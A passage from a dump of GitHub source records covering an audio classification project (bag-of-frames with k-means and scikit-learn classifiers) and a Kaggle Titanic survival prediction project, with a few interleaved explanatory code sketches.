{}\\n\".format(test_time))\r\n\t\toutfile.write(\"Accuracy : {}\\n\".format(acc))\r\n\r\n\twith open(\"Temp\\\\result_labels.csv\",\"wb\") as outfile:\r\n\t\tnp.savetxt(outfile,pred)\r\n\r\n\r\ndef adaboost_predict(training_samples, training_labels, test_samples, test_lables,n_estimators=50, learning_rate=1.0):\r\n\tfrom sklearn.ensemble import AdaBoostClassifier\r\n\r\n\tclf = AdaBoostClassifier(n_estimators = n_estimators, learning_rate =learning_rate)\r\n\r\n\tt0 = time()\r\n\tclf.fit(training_samples,training_labels)\r\n\ttraining_time = round(time()-t0, 3)\r\n\r\n\tt0 = time()\r\n\tpred = clf.predict(test_samples)\r\n\ttest_time = round(time()-t0, 3)\r\n\r\n\tfrom sklearn.metrics import accuracy_score\r\n\r\n\tacc = accuracy_score(pred,test_lables)\r\n\r\n\tno_features = np.array(training_samples).shape[1]\r\n\ttraining_samples = np.array(training_samples).shape[0]\r\n\ttest_samples = np.array(test_samples).shape[0]\r\n\r\n\twith open(\"Temp\\\\results.txt\",\"w\") as outfile:\r\n\t\toutfile.write(\"Alogirthm : {}\\n\".format(\"Adaboost\"))\r\n\t\toutfile.write(\"Estimators = {}\\n\".format(n_estimators))\r\n\t\toutfile.write(\"Learning rate = {}\\n\".format(learning_rate))\r\n\t\toutfile.write(\"No of features : {}\\n\".format(no_features))\r\n\t\toutfile.write(\"No of training samples : 
{}\\n\".format(training_samples))\r\n\t\toutfile.write(\"No of test samples : {}\\n\".format(test_samples))\r\n\t\toutfile.write(\"Training time : {}\\n\".format(training_time))\r\n\t\toutfile.write(\"Test time : {}\\n\".format(test_time))\r\n\t\toutfile.write(\"Accuracy : {}\\n\".format(acc))\r\n\r\n\twith open(\"Temp\\\\result_labels.csv\",\"wb\") as outfile:\r\n\t\tnp.savetxt(outfile,pred)\r\n\r\n\r\ndef randomforest_predict(training_samples,training_labels,test_samples,test_lables,n_estimators =100,criterion = 'gini',min_samples_split=2):\r\n\tfrom sklearn.ensemble import RandomForestClassifier\r\n\r\n\tclf = RandomForestClassifier(n_estimators=n_estimators, criterion=criterion, min_samples_split=min_samples_split)\r\n\r\n\tt0 = time()\r\n\tclf.fit(training_samples,training_labels)\r\n\ttraining_time = round(time()-t0, 3)\r\n\r\n\tt0 = time()\r\n\tpred = clf.predict(test_samples)\r\n\ttest_time = round(time()-t0, 3)\r\n\r\n\tfrom sklearn.metrics import accuracy_score\r\n\r\n\tacc = accuracy_score(test_lables,pred)\r\n\r\n\tno_features = np.array(training_samples).shape[1]\r\n\ttraining_samples = np.array(training_samples).shape[0]\r\n\ttest_samples = np.array(test_samples).shape[0]\r\n\r\n\twith open(\"Temp\\\\results.txt\",\"w\") as outfile:\r\n\t\toutfile.write(\"Alogirthm : {}\\n\".format(\"Random Forest\"))\r\n\t\toutfile.write(\"Estimators = {}\\n\".format(n_estimators))\r\n\t\toutfile.write(\"Criterion = {}\\n\".format(criterion))\r\n\t\toutfile.write(\"min_samples_split = {}\\n\".format(min_samples_split))\r\n\t\toutfile.write(\"No of features : {}\\n\".format(no_features))\r\n\t\toutfile.write(\"No of training samples : {}\\n\".format(training_samples))\r\n\t\toutfile.write(\"No of test samples : {}\\n\".format(test_samples))\r\n\t\toutfile.write(\"Training time : {}\\n\".format(training_time))\r\n\t\toutfile.write(\"Test time : {}\\n\".format(test_time))\r\n\t\toutfile.write(\"Accuracy : {}\\n\".format(acc))\r\n\r\n\r\n\twith open(\"Temp\\\\result_labels.csv\",\"wb\") as outfile:\r\n\t\tnp.savetxt(outfile,pred)\r\n\r\n\r\n\r\n\r\nimport numpy as np \r\nfeatures_train = np.loadtxt(\"Temp\\\\derived_features_train.csv\",delimiter = \",\")\r\nlabels_train = np.loadtxt(\"Temp\\\\derived_labels_train.csv\",delimiter = \",\")\r\nfeatures_test = np.loadtxt(\"Temp\\\\derived_features_test.csv\",delimiter=\",\")\r\nlabels_test = np.loadtxt(\"Temp\\\\derived_labels_test.csv\",delimiter=\",\")\r\n\r\n\r\n\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\n\r\n#first normalize horizontally \r\nfeatures_train = np.transpose(features_train)\r\nfeatures_test = np.transpose(features_test)\r\n\r\nmodel_normalizer_horizontal = MinMaxScaler()\r\nmodel_normalizer_horizontal.fit(features_train)\r\n\r\nfeatures_train = model_normalizer_horizontal.transform(features_train)\r\n\r\n\r\nmodel_normalizer_horizontal = MinMaxScaler()\r\nmodel_normalizer_horizontal.fit(features_test)\r\nfeatures_test = model_normalizer_horizontal.transform(features_test)\r\n\r\nfeatures_train = np.transpose(features_train)\r\nfeatures_test = np.transpose(features_test)\r\n\r\n\r\n#normalize vertically\r\n\r\nmodel_normalizer_vertical = MinMaxScaler()\r\nmodel_normalizer_vertical.fit(features_train)\r\n\r\nfeatures_train = model_normalizer_vertical.transform(features_train)\r\nfeatures_test = model_normalizer_vertical.transform(features_test)\r\n\r\n\r\nimport sys\r\nclassifier = sys.argv[1]\r\nclassifier = classifier.lower()\r\n\r\nif classifier == 
\"svm\":\r\n\tsvm_predict(features_train,labels_train,features_test,labels_test,kernel = \"linear\", C = 1.0)\r\nelif classifier == \"nb\":\r\n\tnaive_bayes_predict(features_train,labels_train,features_test,labels_test)\r\nelif classifier == \"dt\":\r\n\tdecision_tree_predict(features_train,labels_train,features_test,labels_test,criterion=\"gini\",min_samples_split=20)\r\nelif classifier == \"knn\":\r\n\tknn_predict(features_train,labels_train,features_test,labels_test,k_neighbours =11,weights = \"distance\",algorithm = \"kd_tree\")\r\nelif classifier == \"adaboost\":\r\n\tadaboost_predict(features_train,labels_train,features_test,labels_test,n_estimators=100, learning_rate=1)\r\nelif classifier == \"rf\":\r\n\trandomforest_predict(features_train,labels_train,features_test,labels_test,n_estimators=1000,criterion='gini',min_samples_split=2)\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
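test.py repeats an identical fit/predict/time/report block for every algorithm; the duplication collapses into one generic harness. A Python 3 sketch (the commented usage mirrors the script's classifier table):

from time import time
import numpy as np
from sklearn.metrics import accuracy_score

def evaluate(clf, name, X_train, y_train, X_test, y_test):
    t0 = time()
    clf.fit(X_train, y_train)
    fit_s = time() - t0

    t0 = time()
    pred = clf.predict(X_test)
    pred_s = time() - t0

    acc = accuracy_score(y_test, pred)
    print(f"{name}: acc={acc:.3f}  train={fit_s:.3f}s  test={pred_s:.3f}s")
    return pred

# usage, e.g.:
# from sklearn.svm import SVC
# evaluate(SVC(kernel="linear", C=1.0), "SVM", Xtr, ytr, Xte, yte)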
{
"alpha_fraction": 0.7431332468986511,
"alphanum_fraction": 0.7533062100410461,
"avg_line_length": 60.390625,
"blob_id": "d340bc8d2c9ad1c876f457f2702c55e1d7a8bc28",
"content_id": "0831f09cfcc5c9dc2dcb90faaa63a55ea0538229",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3932,
"license_type": "permissive",
"max_line_length": 693,
"num_lines": 64,
"path": "/README.md",
"repo_name": "SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach",
"src_encoding": "UTF-8",
"text": "\n# Audio Classification using Bag-of-Frames approach\n\n## Requirements\n\n### Python 2.7.10 \n\n### Python modules \n\n 1. Librosa 0.4.3\n 2. numpy 1.11.3\n 3. sklearn 0.18\n \n## Execution \n\nDivide the audio into smaller clips of 5-20 secs each . One audio clip is converted into one feature which contains the Bag of Frames for that audio clip. \n\n1. Place the training and the test data in a folder by numbering the categories. Example, if the source folder is \"Data\"\n \n Data -> 1 -> test -> \"test audio files of category 1\" <br />\n Data -> 1 -> train -> \"train audio files of category 1\"<br />\n Data -> 2 -> test -> \"test audio files of category 2\"<br />\n Data -> 2 -> train -> \"test audio files of category 2\"<br />\n \n2. ```python train.py window_length no_of_clusters ```\n\n window_length : Window length to divide the audio clip to <br />\n no_of_clusters : No of cluster centroids for k-means clustering <br />\n \n3. ```python test.py classifier``` \n\n classifiers : svm,nb,dt,knn,adaboost,rf<br />\n Change the parameters in the test.py file to change the parameters of the classifiers.<br />\n All the results are stored in the \"Temp\" Folder\n\n## Project Description \nHuman speech can be broken down into elementary phonemes and can be modeled using algorithms like Hidden Markov Models (HMM). Stationary patterns like rhythm and melody can be used in classification of music. In contrast, Non speech sounds are random, unstructured, and lack the high level structures observed in speech and music, which makes it difficult to model them using HMM. In this project, the Bag of Frames approach is used to classify audio where a codebook of vectors is generated using K-Means clustering on the training data and Bag of Frames for each of the audio clip is obtained using the codebook. These Bag of Frames are used as input to the classifiers for classification. \n\nThe steps involved in the Bag of Frames approach for Environmental Sound Classification is described as follows: \n\n\nA.\tFeature Extraction\n \n 1. For the purpose of feature extraction, the audio clip is divided into several segments by choosing a particular window length. \n 2. Then features are extracted for each of the audio segment.\n 3. Python libraries Librosa and Scikits are used to extract audio features like MFCC, delta MFCC, Linear Predictive Coding(LPC) coefficients along with other frequency domain features like Mel Spectrogram, Spectral Centroid, Spectral Bandwidth, Spectral Roll Off and temporal domain features like Root Mean Square Error (RMSE) and Zero Crossing Rate. \n \n \nB.\tK-Means Clustering and Codebook generation\n\n 1. Once the features are extracted, the whole training and test data is divided into training and test dataset. \n 2. Feature scaling and normalization of training data is done accross each feature.\n 3. The normalized training data is fed into K-Means clustering algorithm with the number of clusters usually much higher than the total number of classes and the cluster centroids are obtained for the normalized training set. \n 4. These cluster centroids form the codebook. \n\nC.\tBag of Frames\n \n 1. In the next step, the feature samples from each of the audio clip are vector quantized with respect to the codebook generated and Bag of Frames is obtained from K-Means output.\n \nD.\tClassification\n\n 1. The Bag of Frames is first normalized across each audio clip and later normalized across each of the features. 
The resultant vectors are labelled accordingly and then used to train a supervised classifier like SVM, KNN or Random Forest.\n \n \nThe test phase includes similar steps where features extracted from the audio clips are normalized and vector quantized using the codebook, followed by obtaining the Bag of Frames for each audio clip. The normalized Bag of Frames are then given as input to the classifier to obtain the final output.\n\n\n"
},
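Steps B and C of the README in runnable miniature (random vectors stand in for normalized audio frames): fit the k-means codebook on the pooled training frames, then vector-quantize one clip against it and histogram the codeword indices into that clip's fixed-length bag of frames:

import numpy as np
from sklearn.cluster import KMeans

rng = np.random.default_rng(0)
train_frames = rng.random((200, 8))          # pooled training frames
clip_frames = rng.random((40, 8))            # frames of one audio clip

k = 16
codebook = KMeans(n_clusters=k, n_init=10, random_state=0).fit(train_frames)

codes = codebook.predict(clip_frames)        # nearest centroid per frame
bag = np.bincount(codes, minlength=k)        # histogram = one clip feature
print(bag.shape, bag.sum())                  # (16,) 40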
{
"alpha_fraction": 0.6828309297561646,
"alphanum_fraction": 0.6841415762901306,
"avg_line_length": 17.461538314819336,
"blob_id": "67a109de922076d267d0ecc801a014f853698a9b",
"content_id": "778b76eb30b58c10dd74ba1738ecd4de056d0e7b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 763,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 39,
"path": "/src/kmeans_train.py",
"repo_name": "SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach",
"src_encoding": "UTF-8",
"text": "import os\r\nimport numpy as np \r\nimport sys \r\n\r\nprint \"Running kmeans clustering .. \"\r\n\r\nno_clusters = sys.argv[1]\r\n\r\nif no_clusters.isdigit() == False:\r\n\t\"No of clusters has to be an integer\"\r\n\tsys.exit()\r\n\r\n\r\nno_clusters = int(no_clusters)\r\nfeatures_train = np.loadtxt(\"Temp\\\\features_train.csv\",delimiter = \",\")\r\n\r\n\r\nimport pickle\r\nwith open(\"Temp\\\\kmeans_normalizer.p\",\"rb\") as infile:\r\n\tnormalizer = pickle.load(infile)\r\n\r\n\r\nfeatures_train = normalizer.transform(features_train)\r\n\r\n\r\nfrom sklearn.cluster import KMeans\r\n\r\n\r\nkmeans = KMeans(n_clusters = no_clusters).fit(features_train)\r\n\r\n\r\n\r\nwith open(\"Temp\\\\kmeans_{}.p\".format(no_clusters),\"wb\") as outfile:\r\n\tpickle.dump(kmeans,outfile)\r\n\r\noutfile.close()\r\n\r\n\r\nprint \"\\nClusters generated and saved\"\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6731851100921631,
"alphanum_fraction": 0.6817572712898254,
"avg_line_length": 23.9375,
"blob_id": "bcb8831d91751b8e991dbbd256f84433851fb235",
"content_id": "e5557c60606c686b571c4ed45b693545bb8290c1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3733,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 144,
"path": "/src/generate_derived_training_test_data.py",
"repo_name": "SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach",
"src_encoding": "UTF-8",
"text": "import os\r\nimport numpy as np \r\n\r\nimport pickle\r\n\r\nimport sys\r\n\r\n\r\nprint \"\\nGenerating bag of frames...\"\r\n\r\nclusters = sys.argv[1]\r\n\r\nif clusters.isdigit() == False:\r\n\t\"No of clusters has to be an integer\"\r\n\tsys.exit()\r\n\r\n\r\n#loading the normalizer for kmeans \r\nwith open(\"Temp//kmeans_normalizer.p\",\"rb\") as infile:\r\n\tkmeans_normalizer = pickle.load(infile)\r\ninfile.close()\r\n\r\n#consider kmeans with 50 cluster centers \r\nwith open(\"Temp/kmeans_{}.p\".format(clusters),\"rb\") as infile:\r\n\tkmeans = pickle.load(infile)\r\ninfile.close()\r\n\r\n\r\n\r\nno_of_centers = kmeans.cluster_centers_.shape[0]\r\n\r\n\r\nsourceFolder = \"Temp//csv\"\r\nsourceFolderFullPath = os.path.abspath(sourceFolder)\r\n\r\ndirs = os.listdir(sourceFolderFullPath)\r\n\r\n#getting derived training data\r\n\r\nderived_features = []\r\nderived_labels = []\r\n\r\nfor dir in dirs:\r\n\r\n\r\n\tlabel = int(dir)\r\n\r\n\tfeaturesTrainPath = \"{}/{}/train\".format(sourceFolderFullPath,dir)\r\n\r\n\ti = 0\r\n\tj = 0\r\n\tfor file in os.listdir(featuresTrainPath):\r\n\t\t\r\n\t\tif \"csv\" in file :\r\n\r\n\t\t\tfeaturesFileFullPath = os.path.join(featuresTrainPath,file)\r\n\r\n\t\t\t#getting training features of a file\r\n\t\t\ttemp_features = np.loadtxt(featuresFileFullPath,delimiter = \",\")\r\n\r\n\t\t\t# #pca \r\n\t\t\t# temp_features = pca.transform(temp_features)\r\n\r\n\t\t\t#remove rows with nan values \r\n\t\t\ttemp_features = temp_features[~np.isnan(temp_features).any(axis=1)]\r\n\r\n\t\t\t#normalizer the features for kmeans \r\n\t\t\ttemp_features = kmeans_normalizer.transform(temp_features)\r\n\r\n\r\n\t\t\t#get kmeans output \r\n\t\t\tkmeans_output = kmeans.predict(temp_features)\r\n\r\n\r\n\t\t\t#getting bag of words as sample\r\n\t\t\tunique, counts = np.unique(kmeans_output, return_counts=True)\r\n\t\t\tsample = [0]*no_of_centers\r\n\t\t\tfor j in range(no_of_centers):\r\n\t\t\t\tif j in unique:\r\n\t\t\t\t\tsample[j] = counts[np.where(unique == j)][0]\r\n\r\n\t\t\t\t\r\n\t derived_features.append(sample)\r\n\t derived_labels.append(int(label))\r\n\r\n\r\n\r\nderived_features = np.array(derived_features).astype(np.float64)\r\nderived_labels = np.expand_dims(derived_labels,axis=1).astype(np.int32)\r\nnp.savetxt(\"Temp\\\\derived_features_train.csv\",derived_features,fmt='%1.3f',delimiter=\",\")\r\nnp.savetxt(\"Temp\\\\derived_labels_train.csv\",derived_labels,fmt='%1.3f',delimiter = \",\")\r\n\r\n\r\n#getting derived test features.\r\n\r\nderived_features = []\r\nderived_labels = []\r\n\r\nfor dir in dirs:\r\n\tlabel = int(dir)\r\n\r\n\tfeaturesTestPath = \"{}/{}/test\".format(sourceFolderFullPath,dir)\r\n\r\n\ti = 0\r\n\tj = 0\r\n\tfor file in os.listdir(featuresTestPath):\r\n\t\t\r\n\t\tif \"csv\" in file :\r\n\r\n\t\t\tfeaturesFileFullPath = os.path.join(featuresTestPath,file)\r\n\r\n\t\t\t#getting training features of a file\r\n\t\t\ttemp_features = np.loadtxt(featuresFileFullPath,delimiter = \",\")\r\n\r\n\r\n\t\t\t#remove rows with nan values \r\n\t\t\ttemp_features = temp_features[~np.isnan(temp_features).any(axis=1)]\r\n\r\n\t\t\t#normalizer the features for kmeans \r\n\t\t\ttemp_features = kmeans_normalizer.transform(temp_features)\r\n\r\n\t\t\t#get kmeans output \r\n\t\t\tkmeans_output = kmeans.predict(temp_features)\r\n\r\n\r\n\t\t\t#getting bag of words as sample\r\n\t\t\tunique, counts = np.unique(kmeans_output, return_counts=True)\r\n\t\t\tsample = [0]*no_of_centers\r\n\t\t\tfor j in range(no_of_centers):\r\n\t\t\t\tif j in 
unique:\r\n\t\t\t\t\tsample[j] = counts[np.where(unique == j)][0]\r\n\r\n\t\t\t\t\r\n\t derived_features.append(sample)\r\n\t derived_labels.append(int(label))\r\n\r\n\r\nderived_features = np.array(derived_features).astype(np.float64)\r\nderived_labels = np.expand_dims(derived_labels,axis=1).astype(np.int32)\r\nnp.savetxt(\"Temp\\\\derived_features_test.csv\",derived_features,fmt='%1.3f',delimiter=\",\")\r\nnp.savetxt(\"Temp\\\\derived_labels_test.csv\",derived_labels,fmt='%1.3f',delimiter = \",\")\r\n\r\n\r\nprint \"Bag of frames generated and saved\\n Training completed. Please run test.py by selecting a classifier to test the data\""
}
] | 8 |
suno09/Titanic
|
https://github.com/suno09/Titanic
|
4abe76b4933ec5fd3d98fb33759ed705e38178d9
|
39a36359a55e16da6f55c4d3e8b1970ee799e0f1
|
a0596830a693f8a4f30a883370072cefb6139943
|
refs/heads/master
| 2020-04-03T23:17:08.649254 | 2018-10-31T22:04:11 | 2018-10-31T22:04:11 | 155,309,461 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6994313597679138,
"alphanum_fraction": 0.7091795206069946,
"avg_line_length": 29.024391174316406,
"blob_id": "8d81e4ee5a5b8851dabc711857b3c63c70a6fef6",
"content_id": "38ad85301e487789d7252c56a58dcc231cb0bff5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1231,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 41,
"path": "/classification_pca.py",
"repo_name": "suno09/Titanic",
"src_encoding": "UTF-8",
"text": "import pickle\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\n\n# Load the classifier\nwith open('classifiers/best_classifier_pca.pik', 'rb') as rp:\n classifier = pickle.load(rp)\n\nwith open('classifiers/dataframe_titanic.pik', 'rb') as rp:\n dataframe = pickle.load(rp)\ndf_prep = dataframe[891:]\n\nobject_cols = df_prep.select_dtypes(\"object\").columns\n\n# Convert the categorical data to numbers\nlabel_encoders = classifier['label_encoders']\nfor obj_col in object_cols:\n label_encoder = LabelEncoder()\n label_encoder.fit(df_prep[obj_col])\n df_prep[[obj_col]] = df_prep[[obj_col]].apply(label_encoder.transform)\n label_encoders[obj_col] = label_encoder\n\n# generate the input of test\nx = df_prep.drop(['Survived'], 1).values.astype(np.float64)\n\n# transform data test with PCA Algotirhm\nx = classifier['pca'].transform(x)\n\n# predict with classifier\nprint(\"Predict with %s\" % classifier['algorithm'])\n\ny = classifier['classifier'].predict(x)\ndf_test = pd.DataFrame(\n data=list(zip(range(892, 892 + len(df_prep)), y.astype(np.int))),\n columns=['PassengerId', 'Survived']\n)\n\ndf_test.to_csv(path_or_buf='classifiers/predict_test_titanic.csv', sep=',',\n index=False)\n"
},
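One thing worth flagging in classification_pca.py: although it loads the pickled label_encoders fitted at training time, it then fits *fresh* LabelEncoders on the test rows, so the integer codes can silently diverge whenever the test set's category inventory differs from training. A self-contained demonstration of why reusing the saved encoder matters:

from sklearn.preprocessing import LabelEncoder

train_vals = ["C", "Q", "S"]          # categories seen at training time
test_vals = ["Q", "S"]                # "C" happens to be absent at test time

saved = LabelEncoder().fit(train_vals)
fresh = LabelEncoder().fit(test_vals)          # what the script effectively does

print(saved.transform(test_vals))     # [1 2] -- codes match training
print(fresh.transform(test_vals))     # [0 1] -- shifted; the model sees garbage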
{
"alpha_fraction": 0.6266268491744995,
"alphanum_fraction": 0.6330746412277222,
"avg_line_length": 33.044715881347656,
"blob_id": "f36042805f548f167633c06c1020bb7e48bd89e5",
"content_id": "58c32a508453f1092de4dc5d65042dfe9698acbf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8375,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 246,
"path": "/classification_threads.py",
"repo_name": "suno09/Titanic",
"src_encoding": "UTF-8",
"text": "import itertools\nimport re\nimport sys\nfrom queue import Queue\nfrom threading import Thread, Lock\nfrom time import time, strftime, gmtime\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\n\n\nstart_time = time()\n\nprint_lock = Lock()\n\nindex_th = 0\nresults = []\n\n\ndef thread_classifier(ml_class, str_classifier, cols,\n x_tr, x_te, y_tr, y_te,\n q: Queue, tnbr_tests):\n\n # Start generate model\n ml_class.fit(x_tr, y_tr)\n\n # save the result\n q.put({\n \"features\": cols,\n \"algorithm\": str_classifier,\n \"accuracy\": accuracy_score(y_te, ml_class.predict(x_te))\n })\n\n # print the progression\n global index_th\n index_th += 1\n progress_value = index_th * 100. / tnbr_tests\n with print_lock:\n sys.stdout.write(\"\\r\")\n sys.stdout.write(\"Progression |%-100s| %.2f %%\" %\n (\"\\u2588\" * int(progress_value), progress_value)\n )\n sys.stdout.flush()\n\n\n# * Data preprocessing\n# read csv file train and test\ndataframe = pd.read_csv('data/train.csv')\n\n# Create column NameType(Mr, Mrs, ...) from Name\ndataframe['NameType'] = [\n re.sub(r'.+?, (.+?)\\..*', r'\\1', name) for name in dataframe.Name\n]\ndataframe.NameType = dataframe.NameType.replace(\n ['Sir', 'Capt', 'Major', 'Don', 'Rev', 'Jonkheer', 'Col'],\n \"Mr\"\n)\ndataframe.NameType = dataframe.NameType.replace(\n ['Mlle', 'Lady', 'Mme', 'Miss', 'Mrs', 'the Countess'],\n \"Ms\"\n)\n\n# replace row contains sex = female and nameType = Dr by Ms\ndataframe.loc[\n (dataframe.Sex == \"female\") & (dataframe.NameType == \"Dr\"), 'NameType'\n] = \"Ms\"\n# replace row contains sex = male and nameType = Dr by Mr\ndataframe.loc[\n (dataframe.Sex == \"male\") & (dataframe.NameType == \"Dr\"), 'NameType'\n] = \"Mr\"\n\n# create family size\ndataframe['FamilySize'] = dataframe.SibSp + dataframe.Parch\n# Fare per passenger (fare per ticket)\ndataframe['FarePerPerson'] = dataframe.Fare / (dataframe.FamilySize + 1)\n\n# replace the NaN with \"Unknown\"\ndataframe.Cabin.fillna('', inplace=True)\n# create the count of Cabin\ndataframe['CabinCount'] = dataframe.Cabin.apply(\n lambda c: len(str(c).strip().split())\n)\n# create the number of Cabin (nbr after the letter)\n# (if exist one or more of cabins so get the first else 0)\ndataframe['NbrOfCabin'] = dataframe.Cabin.apply(\n lambda cs: list(filter(\n lambda c: len(c) > 1, str(cs).strip().split()\n ))\n)\ndataframe.NbrOfCabin = [\n int(c[0][1:]) if c != [] else 0 for c in dataframe.NbrOfCabin\n]\n# Create Column and take the first letter of the cabin and\ndataframe['CabinType'] = dataframe.Cabin\ndataframe.CabinType = [c[0] if c else 'U' for c in dataframe.CabinType]\n# person per Cabin\ndataframe['PersonPerCabin'] = (dataframe.FamilySize + 1) / dataframe.CabinCount\ndataframe.loc[\n dataframe.PersonPerCabin == np.inf, 'PersonPerCabin'\n] = dataframe.loc[dataframe.PersonPerCabin == np.inf, 'FamilySize']\n# Fare of cabin\ndataframe['FareOfCabin'] = dataframe.Fare / dataframe.CabinCount\ndataframe.loc[\n (dataframe.FareOfCabin == np.inf) | dataframe.FareOfCabin.isnull(),\n 'FareOfCabin'\n] = 0\n# # 
Create column and set the cabin by position\n# A = best pos, ..., G = worst pos, U = worst pos\n# cabin_pos = {v: 1./k for k, v in enumerate(\n# ['T', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'U'], 1)}\n# dataframe['CabinPos'] = [cabin_pos[c] for c in dataframe.CabinType]\n\n#\ndataframe.Age = dataframe.groupby([\"NameType\"]).transform(\n lambda a: a.fillna(a.mean())\n).Age\n#\ndataframe.Embarked.fillna('U', inplace=True)\n\n# the new dataframe with deleting some columns\ndf_prep = dataframe.drop(\n ['PassengerId', 'Name', 'Ticket', 'Cabin'],\n axis=1\n)\n\n# get the list of target Survived\ny_target = df_prep.Survived.values\ndf_prep = df_prep.drop(['Survived'], axis=1)\n\n# get the cols of type \"object\"\n# object_cols = ['Sex', 'Embarked', 'NameType', 'CabinType']\nobject_cols = df_prep.select_dtypes(\"object\").columns\n# Convert the categorical data to numbers\ndf_prep[object_cols] = df_prep[object_cols].apply(LabelEncoder().fit_transform)\n\n# generate the classifiers\n# key : name of algorithm\n# value : list of size 2 which contains algorithm and params of algo\nclassifiers = {\n \"Logistic Regression\": [LogisticRegression, {'random_state': 0}],\n \"KNN\": [KNeighborsClassifier,\n {'n_neighbors': 5, 'metric': 'minkowski', 'p': 2}],\n \"SVM rbf\": [SVC, {'kernel': 'rbf', 'random_state': 0}],\n # \"SVM poly\": [SVC, {'kernel': 'poly', 'random_state': 0}],\n # \"SVM sigmoid\": [SVC, {'kernel': 'sigmoid', 'random_state': 0}],\n # \"SVM precomputed\": [SVC, {'kernel': 'precomputed', 'random_state': 0}],\n # \"SVM linear\": [SVC, {'kernel': 'linear', 'random_state': 0}],\n \"Naive Bayes\": [GaussianNB, {}],\n \"Decision Tree\": [DecisionTreeClassifier, {'criterion': \"entropy\",\n 'random_state': 0}]\n ,\n \"Random Forest\": [RandomForestClassifier,\n {'n_estimators': 10,\n 'criterion': 'entropy',\n 'random_state': 0}]\n}\n# generate threads for multiple ML algorithms\nlen_algorithms = classifiers.__len__()\n# count of all columns in data\nlen_cols = len(df_prep.columns)\nstart_nbr_f = 1\nend_nbr_f = df_prep.columns.__len__()\n# end_nbr_f = 3\nnbr_tests = sum(\n len(list(itertools.combinations(range(len_cols), nbr_features))) for\n nbr_features in range(start_nbr_f, end_nbr_f + 1)\n) * len_algorithms\n\n# generate the threads of classifiers\nthreads = []\nqueue = Queue()\nfor nbr_features in range(start_nbr_f, end_nbr_f + 1):\n for indexes_cols in itertools.combinations(range(len_cols), nbr_features):\n columns = [col for index, col in enumerate(df_prep.columns)\n if index in indexes_cols]\n # generate the input and target of train and test\n x = df_prep[columns].values.astype(np.float64)\n x_train, x_test, y_train, y_test = train_test_split(\n x,\n y_target,\n test_size=0.25,\n random_state=0\n )\n\n # get indexes of type objects\n indexes_object_cols = [\n index for index, col in enumerate(columns) if col in object_cols\n ]\n\n # use dummy variables for columns of types object\n if indexes_object_cols:\n onehotencoder = OneHotEncoder(\n categorical_features=indexes_object_cols\n )\n x_train = onehotencoder.fit_transform(x_train).toarray()\n x_test = onehotencoder.transform(x_test).toarray()\n\n # Feature Scaling\n sc = StandardScaler()\n x_train = sc.fit_transform(x_train)\n x_test = sc.transform(x_test)\n\n for name_classifier, [classifier, params] in classifiers.items():\n # extract columns\n # Start generate model\n # print(name_classifier)\n threads.append(Thread(\n target=thread_classifier,\n args=(\n classifier(**params), name_classifier, columns,\n x_train, x_test, y_train, 
y_test,\n queue, nbr_tests\n )\n ))\n\n# start threads and wait all results\n_ = [thread.start() for thread in threads]\n_ = [thread.join() for thread in threads]\nresults = [queue.get() for thread in threads]\n\n# sort and view results\nmax_accuracy = max([d['accuracy'] for d in results])\nbest_classifier = min(\n filter(lambda d: d['accuracy'] == max_accuracy, results),\n key=lambda d: len(d['features'])\n)\n\nend_time = time()\n\nprint(\"\\nThe best classifier is %s\" % best_classifier['algorithm'])\nprint(\"The accuracy : %.2f %%\" % (max_accuracy * 100.))\nprint(\"The columns : %s\" % best_classifier['features'])\nprint(\"The duration of execution : %s\" %\n strftime(\"%H hours %M minutes %S seconds\", gmtime(end_time - start_time))\n )\nprint(\"Number of tests = %d tests\" % results.__len__())\n"
},
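In classification_threads.py the shared progress counter (`index_th += 1`) is updated outside the Lock, which guards only the print; under threads the read-modify-write can interleave and drop increments. The usual fix keeps the update and the report under one lock — a sketch:

from threading import Lock

progress_lock = Lock()
done = 0

def mark_done(total):
    global done
    with progress_lock:               # counter update and print stay together
        done += 1
        print(f"\rprogress {done * 100.0 / total:.2f} %", end="", flush=True)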
{
"alpha_fraction": 0.5879218578338623,
"alphanum_fraction": 0.5914742350578308,
"avg_line_length": 34.1875,
"blob_id": "5010d33bfd5410809939721c1f779c8dbfd73e62",
"content_id": "bd6ac770d4504466e16860daf432b159490d4db8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 563,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 16,
"path": "/README.md",
"repo_name": "suno09/Titanic",
"src_encoding": "UTF-8",
"text": "##################################################################\n###### Titanic: Machine Learning from Disaster, USA DATASET ######\n##################################################################\n\nThis project is about predict survival on the Titanic and get familiar\nwith ML basics.\n\nIt's a great dataset for evaluating simple classification models.\n\nfor more details visit the website:\nhttps://www.kaggle.com/c/titanic\nNB : It's an Prediction Competition in kaggle\n\nThe source code in Python version 3.6\n\nYou can install the packages with requirements.txt\n"
},
{
